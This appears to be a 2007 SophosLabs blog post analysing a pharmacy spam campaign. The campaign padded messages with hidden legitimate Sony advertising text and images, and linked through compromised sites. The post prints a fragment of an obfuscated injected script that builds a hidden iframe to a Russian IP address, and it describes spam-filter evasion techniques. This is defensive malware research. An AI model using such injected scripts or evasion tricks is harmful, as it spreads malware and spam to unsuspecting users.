Automated or manual spam “infection”?
One of the common detection evasion techniques used by spammers is inclusion of legitimate URLs to spam emails. The intention is to lower the overall message spam score and break the message checksumming algorithm. The technique is often combined with paragraphs of text taken from legitimate sources such as from books available through project Gutenberg.
A few days ago, while I was doing my regular spam analysis round I came across several messages that initially looked like ordinary spam. A visible text after the images linking to spam web pages has drawn my attention to the rest of the message. The text looked like taken from a legitimate source, most probably from a Sony’s marketing collateral:
LEGAL
CEA is not responsible for technical, hardware or software failures, any lost or unavailable network connections, failed, incomplete, garbled or delayed computer transmissions, misspelled email addresses, lost or deleted email transmissions due to the settings in your email application. Any of these factors may limit one’s ability to successfully participate in this activity.Uncharted: Drake’s Fortune is a trademark of Sony Computer Entertainment America Inc. Created and developed by Naughty Dog, Inc. © 2007 Sony Computer Entertainment America Inc.
“PlayStation”, “PLAYSTATION”, and the “PS” Family logo are registered trademarks of Sony Computer Entertainment Inc. Underground is a trademark of Sony Computer Entertainment America Inc. 2007 Sony Computer Entertainment America Inc. The Sony Computer Entertainment logo is a registered trademark of Sony Corporation.
Sony Computer Entertainment America Inc., 919 E. Hillsdale Blvd., Foster City, CA 94404
A quick look at the message source reveals the rest of the message which seems to be a legitimate advertisement for the game Uncharted: Drake’s Fortune, with a twist of having white text on white background (common for Bayesian poisoning).
What really makes this message spam is a paragraph inserted in the middle of the message. The paragraph contains three URLs pointing to web pages that redirect the browser to domains serving the notorious “Canadian Pharmacy” website.
Another interesting characteristic is usage of legitimate images for linking to spam sites. A legitimate image used in this campaign comes from Barnes and Noble and is possibly used in Barnes and Noble’s holiday season mailing list:
I wonder if the combination of legitimate images with spam URLs was a part of an attempt to confuse anti-spam software?
The next step is to investigate the sites linked from the message. All three spam URLs point to a page store.htm. After investigating the domains it looks like the sites were not specifically made with the spamming intention, but neglected and eventually compromised to redirect to “Canadian Pharmacy”. A request to one of the website’s root directory returns a 403-Access forbidden page which looks like a default 403, but contains a suspicious script in the <body> tag of the document.
status=”;zz=’2′;sl=’/';sf=’ram’;pi=’9′;po=’.';qu=’:';yh=’4′;tr=’c.p’;
vo=’3′;bw=’5′;pt=’tp’;ab=’src’;dg=’ht’;ko=’e';wd=’if’;ji=’hp’;hh=’1′;
The script variables are used to construct an <iframe> pointing to an ip address hosted in Russia. A visit to the ip address reveals that the owner is not interested in seeing us. Maybe we are not coming from the right location/country, or we are using a wrong browser or he is indeed fast asleep?
From the layout of the message source you could almost conclude that the message was “infected” by spam in an automated way. On the other hand, some logic was required to place the spam paragraph in the middle of an HTML table, which makes me think this is a one-off testing of effectiveness created by manual modification. A more sophisticated approach to this technique may make spam analysis more complex in the future.
Posted on November 22nd, 2007 by Vanja Svajcer, SophosLabs, UKFiled under: General, Malware, Spam
Windows 7 security - A great leap forward or business as usual?
